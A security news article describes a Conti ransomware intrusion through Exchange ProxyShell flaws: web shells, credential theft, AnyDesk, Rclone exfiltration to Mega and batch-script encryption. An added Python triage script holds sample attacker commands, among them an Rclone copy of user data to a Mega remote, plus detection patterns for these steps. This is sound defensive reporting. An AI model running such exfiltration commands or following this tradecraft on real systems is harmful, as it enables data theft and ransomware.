
Conti Ransomware Gang Hacking Microsoft Exchange Servers Using ProxyShell Exploits


Researchers have uncovered a new, ongoing attack campaign in which the Conti ransomware gang uses the ProxyShell exploit chain to target organizations' networks.

ProxyShell is an exploit chain that abuses Microsoft Exchange vulnerabilities reported over the past months; Microsoft patched them and released the fix in its May 2021 Patch Tuesday update.

Conti is one of the most ruthless ransomware gangs: the FBI reported that the gang was involved in more than 400 high-profile cyber attacks, with ransom demands as high as $25 million.


The new ProxyShell attack is being adopted by ransomware groups: the same exploit was already used by the LockFile ransomware, and it is now in use by the Conti ransomware.

Researchers from Sophos believe the attackers have gained experience with these techniques, which shows in how little dwell time they need before launching the final ransomware payload on target networks.

Conti also gained access to the targeted network in under a minute and set up a remote web shell. Following this, they installed a second web shell that acts as a backup.

Thirty minutes later, the attackers generated a complete list of the computers deployed in the targeted network, the domain controllers, and the domain admins.

Executing commands, it took them about an hour to obtain the credentials of domain administrator accounts; within another 48 hours they exfiltrated about 1 terabyte of data; and finally, within 48 hours, they deployed the Conti ransomware to every machine on the network.

Technical Analysis

A chain of Microsoft Exchange vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) was fixed in the recent April and May Exchange Server cumulative updates, which requires organizations to upgrade their Exchange servers.

But some organizations leave their Exchange servers unpatched to avoid email downtime, which exposes them to attackers who routinely scan for vulnerable systems.

Once the attackers successfully entered the network, they created a new mailbox for “administrator” and assigned it a new role using Microsoft Exchange cmdlets, which let them execute shell commands remotely.

Later, the attackers created a web shell, addressed via the server's localhost, and executed a base64-encoded PowerShell script. The web shell was dropped at:

\\127.0.0.1\C$\inetpub\wwwroot\aspnet_client\aspnetclient_log.aspx

In the next stage, the attackers used the encoded command to abuse the Service Control Manager to run a directory listing of the folder where the web shell was dropped.

In the reconnaissance phase, the attackers ran another PowerShell command to retrieve the list of domain computers from a text file and to collect information about the network configuration, domain administrators, users actively connected to the system, and the process ID of the Local Security Authority Subsystem Service (LSASS), Sophos said.

Once they had collected all the necessary data, the attackers dropped an executable file (SVN.exe) and ran it on the system, which then established a connection to a C2 server located in Finland.

With the initial compromise complete, the attackers stole credentials and then began lateral movement using an existing domain administrator account whose password they had cracked.

“That account was used to create an RDP connection from the Exchange server to another server. One minute later, the logs of that server show the domain admin account downloading and installing the AnyDesk remote desktop software as a service.”

Finally, the attackers deployed the file-copying utility Rclone on multiple servers with the help of a PowerShell script.

The data was then transferred to the Mega file-sharing service, using a configuration that included the addresses of the remote drives and the username and password for that account.

On the fifth day after the initial compromise, the Conti actors began deploying the ransomware and encrypting files.

“Four batch scripts (called 1help.bat, 2help.bat, 3help.bat, and 4help.bat) were run from four servers. The batch files repeatedly invoked the ransomware executable (x64.exe), with each iteration targeting specific drives on every Windows system on the network by their default file sharing names.”
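As an added defensive example (not code from the article or from Sophos), the following Python script triages constructed sample telemetry for the indicators this article describes: the web shell dropped under aspnet_client, base64-encoded PowerShell launched from the IIS worker process, Rclone pushing data to a Mega remote, AnyDesk installed as a service, and the numbered Nhelp.bat scripts invoking x64.exe. The event record shape and the w3wp.exe parent process are assumptions, not details from the article.

```python
import base64
import re

# Constructed sample telemetry (not the victim's logs). The record shape
# (type, parent, cmd, path, image) is an assumption; map your own Sysmon/EDR/
# file-audit events onto it. The web shell is assumed to spawn from w3wp.exe.
ENC = base64.b64encode(r"dir C:\inetpub\wwwroot\aspnet_client".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"type": "file_write", "path": r"\\127.0.0.1\C$\inetpub\wwwroot\aspnet_client\aspnetclient_log.aspx"},
    {"type": "process", "parent": "w3wp.exe", "cmd": "powershell.exe -enc " + ENC},
    {"type": "process", "parent": "powershell.exe", "cmd": r"rclone.exe copy \\srv1\C$\Users mega:exfil -P"},
    {"type": "service_installed", "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe"},
    {"type": "process", "parent": "cmd.exe", "cmd": "cmd /c 1help.bat"},
    {"type": "process", "parent": "explorer.exe", "cmd": "notepad.exe readme.txt"},  # benign
]

ENCODED_PS = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# (rule name, event type it applies to, regex over that event's key field)
RULES = [
    # web shell written under the IIS aspnet_client directory (the path quoted above)
    ("webshell_write", "file_write", re.compile(r"\\aspnet_client\\[^\\]+\.aspx$", re.I)),
    # IIS worker process launching PowerShell with a base64-encoded command
    ("encoded_ps_from_iis", "process", re.compile(r"^w3wp\.exe\|.*powershell.*-(e|ec|enc|encodedcommand)\s", re.I)),
    # Rclone pushing data to a Mega remote
    ("rclone_to_mega", "process", re.compile(r"\brclone(\.exe)?\b.*\bmega\b", re.I)),
    # numbered Nhelp.bat scripts and the x64.exe ransomware binary they invoke
    ("ransomware_batch", "process", re.compile(r"\d+help\.bat|\bx64\.exe\b", re.I)),
    # AnyDesk registered as a Windows service for persistent remote access
    ("anydesk_service", "service_installed", re.compile(r"anydesk", re.I)),
]

def decode_encoded_powershell(cmd):
    """Return the script behind a -EncodedCommand argument (UTF-16LE), or None."""
    m = ENCODED_PS.search(cmd)
    return base64.b64decode(m.group(1)).decode("utf-16-le", "replace") if m else None

def scan(events):
    """Return (rule, detail) hits; detail is the decoded script for encoded PowerShell."""
    hits = []
    for ev in events:
        # process events are matched as "parent|command line" so parent-child rules work
        field = (ev["parent"] + "|" + ev["cmd"]) if ev["type"] == "process" else (ev.get("path") or ev.get("image"))
        for name, etype, rx in RULES:
            if ev["type"] == etype and rx.search(field):
                hits.append((name, decode_encoded_powershell(ev.get("cmd", "")) or field))
    return hits
```

Running scan(SAMPLE_EVENTS) flags five of the six records and decodes the encoded command so an analyst sees the directory listing in clear text rather than a base64 blob.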

ProxyShell and other attacks on known Microsoft Exchange vulnerabilities are running at extremely high levels right now. Organizations are advised to update and patch on-premises Exchange Servers as soon as possible.

Here are the recently released updates with the patches for the Microsoft Exchange server.


Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
